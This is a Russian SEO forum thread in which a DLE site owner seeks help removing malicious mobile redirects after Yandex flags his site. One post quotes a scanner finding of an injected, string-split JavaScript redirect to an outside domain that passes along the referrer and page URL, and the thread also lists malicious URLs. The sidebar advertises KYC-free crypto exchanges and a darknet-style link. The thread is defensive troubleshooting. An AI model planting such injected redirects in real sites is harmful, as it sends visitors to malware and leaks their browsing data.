Войти

Войти | Регистрация
Поиск по сайту
Вредоносный код на сайте
Поиск  Правила 
Seo форум » Поисковая оптимизация » Вопросы новичков
Страницы: 1 2 След.
Вредоносный код на сайте, Хорошо было бы устранить :)
#1
19 Апреля 2013 21:53
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1,
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Изменено: Vorobey - 19 Апреля 2013 22:01
Фан-cайт группы - «Ляпис Трубецкой»
#2
19 Апреля 2013 22:05
У вас сайт на DLE?
#3
19 Апреля 2013 22:06
motlik, да.
#4
19 Апреля 2013 22:09
Тогда ищите вредоносный код здесь:
/index.php
/engine/data/dbconfig.php
/engine/data/config.php
/engine/init.php
/engine/engine.php
/language/Russian/website.lng
#5
19 Апреля 2013 22:09
Какая версия движка у вас?
#6
19 Апреля 2013 22:10
motlik, спасибо. Сейчас буду искать. Версия 9.4.
#7
19 Апреля 2013 22:18
Была у меня такая зараза, только сайт на вордпресс. Когда заходили с телефона - редирект шел на сайт, предлогающий скачать новую версию браузера. Редирект шел через .htaccessПроблему решил так: закачал на комп полностью все файлы ( у меня было 3 сайта) - проверил антивирусом (Avira). Он нашел заразу и удалил. Поменял .htaccess на нужный с выставлением нужных прав на файл. Просто редактирование .htaccess ничего не давало - через пару минут он заменялся.
#8
19 Апреля 2013 22:26
Цитата
Vorobey пишет:
Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Вот только что до вас лечили сайт в соседней теме. Неужели сложно пройтись по темам, перед созданием своей.
Открой свой магазин за 5 минут, их товары, их обслуживание, с тебя только клиенты >>> РЕГИСТРАЦИЯ <<<
Скрин выплат по запросу.
Рефералам помощь.
#9
19 Апреля 2013 22:42
Тоже такое было, если нужно исправить и выличить пиши в ЛС
#10
19 Апреля 2013 23:13
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
#11
19 Апреля 2013 23:15
Цитата
motlik пишет:
Думаю вам следует обновить до 9.8 (и не придется искать вредоносный код). А также удалить все аватары пользователей сайта. Шел заливался через gif-аватар скорее всего. Погуглите "массовый взлом сайтов на dle tehApocalypse".
чего ? каким образом ? чисто физически это не возможно
#12
20 Апреля 2013 00:10
Ребята, всем спасибо за ответы. Завтра уже, все проверю. И отпишусь.
#13
21 Апреля 2013 16:55
Цитата
Vorobey пишет:
Всем доброго времени суток! В общем, такая вот проблема. Есть сайт, с января месяца постоянно попадает в категорию подозрительных сайтов, и в поиске Яндекса помечается вот таким вот текстом: "Сайт может угрожать безопасности вашего компьютера или мобильного устройства". Каждый раз, по результатам выборочной проверки, вредоносный код находится на одной и той же странице (самой посещаемой, но не главной).
Поговорил с платоном, он ответил:
Цитата
При посещении сайта с мобильных устройств, наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на следующие вредоносные ресурсы:
http://up-daters.ru/m.php?id=14316#_screen1 (http://\"http://up-daters.ru/m.php?id=14316#_screen1\"),
http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html (http://\"http://ios.google.com.details-download.r632bgwsmo478vv29tlnjvy2tzdgfyz2fmfkjuuz3rhdmtixe.qooq1e.net/update.html\")

Я давным давно убрал подобные партнерки. И знать не могу, откуда взялись редиректы на эти ссылки. Скачал файлы сайта на компьютер, проверил их поиском (искал по ссылкам) ничего не нашел. Кто сталкивался с такой проблемой? Подскажите, где искать вредоносный код? Ибо я сталкиваюсь с такой проблемой первый раз. Буду благодарен!
Была такая-же бяка написал на хост всё исправили и извенились! Ответ был извините была ddos атака на хостинг, Я им в ответ что-же вы ляди исправляли целую неделю пока я не заметил? Мы не можем уследить за каждым ресурсом, если бы Вы сообщили нам раньше, мы отреагировали бы сразу!
#14
21 Апреля 2013 21:49
Всем добрый вечер. Решил проверить сайт, как вы писали. В config, dbconfig и .htaccess ничего не нашел. Просканировал ещё раз через Касперского - тоже молчит. Искал по ссылкам через тотал командер - не нашел ничего. В тех файлах, что писал motlik тоже искал, но не нашел. Возможно, пропустил. Подскажите, точнее, что именно нужно искать? И где ещё может сидеть эта зараза? На хостинг пока что не писал. Эту тему - читал, ничего полезного не нашел. Не хочу пока что обновлять движок, так как куча модулей установлено, и я уже и не помню, где и что менял. Искал по тому коду, который ТС из соседней темы нашел, тоже ничег оне нашел. Есть ещё предложения?)
Изменено: Vorobey - 21 Апреля 2013 21:52
#15
21 Апреля 2013 22:48
Просканировал сайт через http://sucuri.net/. Написано:

Код
Anomaly behavior detected (possible malware). 
Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script>window.location=("ht"+"tp:"+"//dledle.net/user/id?11&seo"+"ref="+encodeURIComponent(document.referrer)+ "&para"+"meter="+"word&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL));</script><!DOCTYPEhtml PUBLIC "-//W3C//DTD XHTML 1.0 Strict//RU" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

Все это, в http://site.ru/?do=register. Мне это мало о чем сказало, я проверил файл /modules/register.php - ничего не нашел.  Искал так же по всему сайту ссылку dledle.net - тоже не нашел.
 
Страницы: 1 2 След.
Похожие темы:
  06.12.2025 18:31  Хлебные крошки на сайте: сказка из Простоквашино про навигацию в интернете
  01.12.2023 23:56  Совсем нет посетителей на сайте
  23.09.2023 11:44  Правильно ли сделано на сайте?
  22.07.2022 12:19  Как называется сервис по проверке оптимизации на сайте?
  06.05.2022 16:39  Нашел на своем сайте ссылки на порносайты
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
11:07 01.02. Апдейт 31.01 // Chrome готовит "чёрную метку" для ИИ? 
06:34 Гугл пухнет от кеша, а нам - крошки. Разбор $114 млрд: Адсенс в минусе, Ютуб на подписках 
01:09 Yahoo Scout: Нейро-привет из склепа. Реальный шанс на траф или мимо? 
17:33 AntiBot Cloud - бесплатный скрипт и сервис защиты сайтов 
15:14 Апдейт Яндекса 7 февраля. Пока серп трясет, некоторые по ботам плачут 
15:10 Google Discover Core Update: Дискавер отделяют от поиска? 
11:30 ЕС душит ТикТок: прощай бесконечная лента и RPM? Что с монетизацией? 
04:09 Просто $0.04/IP 9PROXY.COM Резидентные прокси Неограниченная пропускная способность Уникальная политика замены Без чёрного списка 
02:31 Профессиональный и грамотный дизайн от DesignCash 
18:27 Nexulume.com Обменник без AML и KYC 
15:45 Mixmasters - Exchange without AML and KYC 
10:22 Swapwatch.org — Мониторинг криптовалютных обменников 
10:19 SwapPix.io - быстрый и безопасный обменник криптовалют. 
15:12 CryptoGraph — Анонимный обмен криптовалют без KYC и AML 
05:10 Точные прогнозы на футбол 
02:08 K*R*A*K*EN // ссылка на февраль 2026 
00:28 Кулеры и БП станут золотыми? Медь по 13 штук, олово в космосе 
18:34 Ставки на супер тренды в спорте 
15:30 Гильотина для классиков: Клод доедает физические книги 
11:10 Moltbook: Соцсеть для ботов, где людям закрыли рот. Началось? 
22:31 [AI] Бот за $600к советовал есть сыр с крысами. Нью-Йорк его (наконец-то) снес 
Апдейты
  • Яндекс ИКС Яндекс выдача 23.12.2025 (48 дней назад)
  • Яндекс выдача Яндекс выдачаМониторинг апдейтов 07.02.2026 (2 дня назад)

     Доска объявлений
     Купить / Продать
     Работа / Услуги
Интересные темы
—  Монетизация любого типа контента на YouTube. Adsense больше не нужен!
—  Ютуб - продвижение и заработок
—  Развитие канала в Яндекс Дзен
—  Новая акция 2025: Заработай* до 5 432 руб. за пару минут** просто, бесплатно и без смс. Сможет даже новичок
—  Заработок на Рутубе 2025


Показать все

Интернет новости

Как понравиться Google?26.03
Как понравиться Google?

25.03 Telegram заблокировали в Испании

25.03 Власти РФ требуют от Telegram бороться с "не такими" новостями

23.03 Microsoft покупает рекламу в выдаче Google для раскрутки Bing

22.03 Google Gemini открыта для тестирования

21.03 Yahoo! продолжает "угрожать" своим новым поиском


Инструменты
Все инструменты

© Сервис анализа сайтов CY-PR.com 2008-2050